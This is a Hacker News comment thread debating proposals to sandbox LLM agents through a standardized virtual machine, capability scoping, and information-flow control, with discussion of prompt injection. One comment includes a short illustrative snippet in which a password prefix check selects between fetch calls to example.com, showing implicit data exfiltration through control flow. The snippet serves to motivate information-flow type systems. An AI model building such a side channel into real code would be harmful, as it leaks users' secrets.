by azhenley on 8/30/25, 1:25 PM with 121 comments
by singron on 8/30/25, 6:06 PM
by ayende on 8/30/25, 3:59 PM
For example, in the book-a-ticket scenario - I want it to be able to check a few websites to compare prices, and I want it to be able to pay for me.
I don't want it to decide to send me to a 37 hour trip with three stops because it is 3$ cheaper.
Alternatively, I want to be able to lookup my benefits status, but the LLM should physically not be able to provide me any details about the benefits status of my coworkers.
That is the _same_ tool cool, but in a different scope.
For that matter, if I'm in HR - I _should_ be able to look at the benefits status of employees that I am responsible for, of course, but that creates an audit log, etc.
In other words, it isn't the action that matters, but what is the intent.
LLM should be placed in the same box as the user it is acting on-behalf-of.
by nhod on 8/30/25, 2:42 PM
And then this post today which makes a very strong case for it. (Yes, a VM isn’t an entire OS, Yes, it would be lighter weight than a complete OS. Yes, it would be industry-wide. Yes, we’d likely use an existing OS or codebase to start. Yes, nuance.)
by spankalee on 8/30/25, 6:20 PM
The VM analogy is simply insufficient for securing LLM workflows where you can't trust the LLM to do what you told it to with potentially sensitive data. You may have a top-level workflow that needs access to both sensitive operations (network access) and sensitive data (PII, credentials), and an LLM that's susceptible to prompt injection attacks and general correctness and alignment problems. You can't just run the LLM calls in a VM with access to both sensitive operations and data.
You need to partition the workflow, subtasks, operations, and data so that most subtasks have a very limited view of the world, and use information-flow to track data provenance. The hopefully much smaller subset of subtasks that need both sensitive operations and data will then need to be highly trusted and reviewed.
This post does touch on that though. The really critical bit, IMO, is the "Secure Orchestrators" part, and the FIDES paper, "Securing AI Agents with Information-Flow Control" [1].
The "VM" bit is running some task in a highly restricted container that only has access to the capabilities and data given to it. The "orchestrator" then becomes the critical piece that spawns these containers, gives them the appropriate capabilities, and labels the data they produce correctly (taint-tracking: data derived from sensitive data is sensitive, etc.).
They seem on the right track to me, and I know others working in this area who would agree. I think they need a better hook than "VMs for AI" though. Maybe "partitioning" or "isolation" and emphasize the data part somehow.
by eksrow on 8/30/25, 3:07 PM
From a hosting perspective which the article talks about I would worry more about just keeping the AI agent functional/alive in a whatever environment a big challenge, using AI a great but stability in any basically use-case has been rough for me personally.
From a developer perspective I've been using devcontainers with rootless docker via wsl and while I'm sure there's some malware that can bypass that (where this VM approach would be a lot stronger) I feel a lot safer this way than running things on the host OS. Furthermore you get the same benefits like reproducibility and separation of concerns and whenever the AI screws something up in your environment you can simply rebuild the container.
by bitexploder on 8/30/25, 3:06 PM
by athrowaway3z on 8/30/25, 6:11 PM
We have user accounts, Read/Write/Exec for User/Groups. Read can grant access tokens which solves temporary+remote requirements. Every other capabilities model can be defined in those terms.
I'd much rather see a simplification of the tools already available, then re-inventing another abstract machine / protocol.
I hope we'll eventually get a fundamental shift in the approach to software as a whole. Currently, everybody is still experimenting with building more new stuff, but it is also a great opportunity to re-evaluate and, at acceptable cost, try to strip out all the cruft and reduce something to its simplest form.
For example - I found an MCP server I liked. Told Claude to remove all the mcp stuff and put it into a CLI. Now I can just call that tool (without paying the context cost). Took me 10 minutes. I doubt, Claude is smart enough to build it back in without heavy guidance.
by shwaj on 8/30/25, 3:51 PM
by armcat on 8/30/25, 3:53 PM
by Imustaskforhelp on 8/30/25, 3:04 PM
by shykes on 8/30/25, 6:47 PM
If you're curious to see one real-life implementation of this (I'm sure there are others), we're pretty far along in doing this with Dagger:
- We already had system primitives for running functions in a sandboxed runtime
- We added the ability for functions to 1) prompt LLMs, and 2) pass other functions to the LLMs as callbacks.
- This way, a function can call LLMs, a LLM can call functions, in any permutation.
- This allows exploring the full spectrum from fully deterministic workflows, to autonomous agents, and everything in between - without locking yourself in a particular programming language, library or framework.
- We've also experimented with passing objects to the LLM, and mapping each of the object's methods to a tool call. This opens interesting possibilities, since the objects can carry state - effectively extending the LLM's context from text only, to arbitrary structured data, without additional dependencies like complex databases etc.
Relevant documentation page: https://docs.dagger.io/features/llm
by tritondev on 8/31/25, 3:06 PM
I took a first pass at enumerating some ideas a few weeks ago: https://davehudson.io/blog/2025-08-11
My thought was to try and define this in a slightly more concrete way by thinking about analogies between the way LLMs operate and more conventional OS processes/tasks.
Building some of the core abstractions isn't too hard - I already have one that unifies the chat and tool use interfaces for 8 different LLM backends. That lets tool approvals be managed in a centralized way. I've not yet implemented a capabilities model but it feels natural, and I worked with one back in the 90s (VSTa if anyone is interested in historical OSes). A key part will be to allow one LLM to delegate a subset of its current capabilities to another (I already built the delegation tooling)
by rbren on 8/30/25, 3:06 PM
by jmount on 8/30/25, 5:43 PM
by CuriouslyC on 8/30/25, 6:44 PM
by martini333 on 8/30/25, 4:36 PM
by ilaksh on 8/30/25, 2:57 PM
by perlgeek on 8/30/25, 6:50 PM
From a security perspective, the real problem seems to me that LLMs cannot distinguish between instructions and data; I don't see how this proposal even attempts to address this, but then I haven't really understood their problem description (if there was one).
by mehulashah on 8/30/25, 2:30 PM
by zmmmmm on 8/31/25, 12:21 AM
by kingkawn on 8/30/25, 9:49 PM
by liveoneggs on 8/30/25, 3:58 PM
It's just too bad tcl, lua, forth, js, wasm, etc just aren't AI-scale.
by kookamamie on 8/30/25, 6:26 PM
by delduca on 8/30/25, 2:35 PM
by lvl155 on 8/30/25, 4:11 PM
by saagarjha on 8/31/25, 10:18 AM
Really, what you should be looking at is that you've hired a potentially malicious person to do something on your behalf. Obviously if you don't give them access to your tax documents, they can't read your tax documents. But the kinds of tasks you will want this agent to do at some point are to manage your calendar, read your email, perhaps even summarize your finances. There's no VM that somehow patches the Wells Fargo site to only give you your bank statements and not let you send money to people. The idea of trying to "sandbox" this barely even makes sense because we haven't historically tried to isolate this kind of operation. But, as people keep putting models in new places, it's evident that something like that will have to evolve here. And it's definitely not going to be Qubes, or the JVM, or WebAssembly, or the dozen other things that people have been suggesting as solutions to the problem.
by kachapopopow on 8/30/25, 6:41 PM
by polotics on 8/30/25, 6:52 PM
by slashdave on 8/30/25, 6:54 PM
by tylerhou on 8/30/25, 9:28 PM
An operating system (or sandbox, or whatever) is a very large virtual machine, where the "instructions" are the normal CPU instructions plus the set of syscalls. Unfortunately, operating systems today are complicated, hard to understand, and (relatively) hard to modify. For example, there are many different ways to sandbox file system access (chmod, containers, chroot, sandbox-exec on macOS etc.) and they each have bugs that have turned into "features" or subtle semantics. Plus, they are not available on all operating systems or even on all distributions of the same operating system. And then -- how do filesystem permissions and network permissions interact? Even of both of their semantics are "safe," is the composition of the two safe?
The assumption is: because operating systems are so complex, large, and underspecified, it probably is dangerous for LLMs to interact directly with the underlying operating system. We have observed this empirically: through CVEs in C and C++ code, we know that subtle errors or small differences in semantics can cascade into huge security vulnerabilities.
To address this, the authors propose that LLMs instead interact with a virtual machine where, for example, the semantics of permissions and/or capabilities is well-defined and standardized across different implementations or operating systems. (This is why they mention Java as an analogy -- the JVM gave developers the ability to write code for a vast array of architectures and operating systems without having to think about the underlying implementations.) This standardization makes it easier to understand how exactly an LLM would be allowed to interact with the outside world.
Besides semantic understanding and clarity, there are more benefits to designing a new virtual machine.
- Standardization across multiple model providers (mentioned).
- Better RLHF / constrained generation opportunity than general Bash output.
- Can incorporate advances in programming language theory and design.
For an example of the last point, in recent years, there has been a ton of research on information flow for security and privacy (mentioned in the article). In a programming language that is aware of information flow, I can mark my bank account password as "secret" and the input to all HTTP calls as "public." The type system or some other static analysis can verify that my password cannot possibly affect the input to any HTTP call. This is harder than you think because it depends on control flow! For example, the following program indirectly exfiltrates information about my password:
if (password.startsWith("hackernews")) {
fetch("https://example.com/a");
} else {
fetch("https://example.com/b");
}
Obviously, nobody would write that code, but people do write similar code with bugs in e.g. timing attacks.by mathiaspoint on 8/30/25, 4:44 PM